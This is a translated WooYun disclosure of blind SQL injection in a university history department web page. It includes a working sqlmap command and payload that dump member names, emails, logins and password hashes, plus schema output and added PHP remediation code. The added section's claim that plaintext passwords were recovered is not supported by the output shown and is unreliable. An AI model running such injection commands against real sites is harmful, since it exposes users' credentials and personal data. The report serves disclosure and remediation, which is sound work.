Vulnerability summary

Defect ID: wooyun-2015-0148646

Title: SQL injection in a page of the Department of History, The Chinese University of Hong Kong (names, email addresses, passwords and other data of multiple users can be obtained) (Hong Kong)

Vendor: The Chinese University of Hong Kong

Author: 路人甲

Submitted: 2015-10-22 19:05

Fixed: 2015-12-10 11:00

Published: 2015-12-10 11:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organisation (HKCERT, Hong Kong Computer Emergency Response Team Coordination Centre) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-10-22: Details sent to the vendor, awaiting vendor handling
2015-10-26: Vendor has confirmed; details disclosed to the vendor only
2015-11-05: Details disclosed to core white hats and experts in the relevant field
2015-11-15: Details disclosed to regular white hats
2015-11-25: Details disclosed to intern white hats
2015-12-10: Details disclosed to the public

Brief description:

SQL injection in a page of the Department of History, The Chinese University of Hong Kong (names, email addresses, passwords and other data of multiple users can be obtained)

Detailed description:

Test URL: http://**.**.**.**/201415_hist6011d.html?id=2706

python sqlmap.py -u "http://**.**.**.**/201415_hist6011d.html?id=2706" -p id --technique=B --threads=10  -D d5cms -T d5_member -C fullName,email,login,password --dump

Proof of vulnerability:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2706 AND 5599=5599
---
web server operating system: Windows
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5
available databases [3]:
[*] d5cms
[*] information_schema
[*] test
Database: d5cms
[9 tables]
+-------------------------+
| d5_c_color_scheme |
| d5_c_status |
| d5_c_type |
| d5_forms |
| d5_generic_content |
| d5_member |
| d5_tags |
| d5_userlevelpermissions |
| d5_userlevels |
+-------------------------+
Database: d5cms
Table: d5_member
[11 columns]
+----------------+-----------------------+
| Column | Type |
+----------------+-----------------------+
| activated | tinyint(4) |
| cms_memo | text |
| email | varchar(250) |
| fullName | varchar(100) |
| login | varchar(20) |
| memID | mediumint(9) unsigned |
| parentID | mediumint(9) unsigned |
| password | varchar(32) |
| RestrictIP | varchar(15) |
| RestrictIPMask | varchar(15) |
| role | int(1) |
+----------------+-----------------------+
Database: d5cms
Table: d5_member
[59 entries]

Fix recommendation:

Filter the input.
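The report's fix advice is a single word. As an added example (not code from the report or from the affected site), the following shows the PHP pattern that produces a boolean-based blind injection in an integer id parameter next to the remediation that "filtering" amounts to in practice: validate the type, then bind the value in a prepared statement. The table and column names, the DSN and the credentials are assumptions.

```php
<?php
// Added example, not the site's own code. The stack on the page is PHP 5.5.9
// with MySQL 5; the table name comes from the report's table list, while the
// column names (id, title, body), DSN and credentials are assumed.

// Vulnerable pattern: the raw GET value is pasted into the SQL string, so
// "?id=2706 AND 5599=5599" becomes part of the WHERE clause and the page's
// true/false behaviour leaks data one bit at a time.
function lookupVulnerable(PDO $db, string $rawId): ?array
{
    $sql = "SELECT title, body FROM d5_generic_content WHERE id = $rawId";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened pattern: reject anything that is not a positive integer, then
// bind the value as a parameter so it is never interpreted as SQL.
function lookupSafe(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // "2706 AND 5599=5599", "2706'" and similar are refused here
    }
    $stmt = $db->prepare('SELECT title, body FROM d5_generic_content WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Assumed connection settings; real prepared statements on the server side.
$db = new PDO('mysql:host=localhost;dbname=d5cms;charset=utf8mb4', 'app_user', 'app_pass', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

$row = lookupSafe($db, $_GET['id'] ?? '');
if ($row === null) {
    http_response_code(404);
    exit;
}
echo htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8');
```

The dumped password column is a 32-character varchar and sqlmap recovered plaintexts for several entries, so the fix should also rehash stored passwords with password_hash() (available since PHP 5.5) rather than only closing the injection.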

Copyright notice: please credit 路人甲@WooYun when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2015-10-26 10:59

Vendor reply:

The relevant organisations have been contacted to handle this.

Latest status:

None yet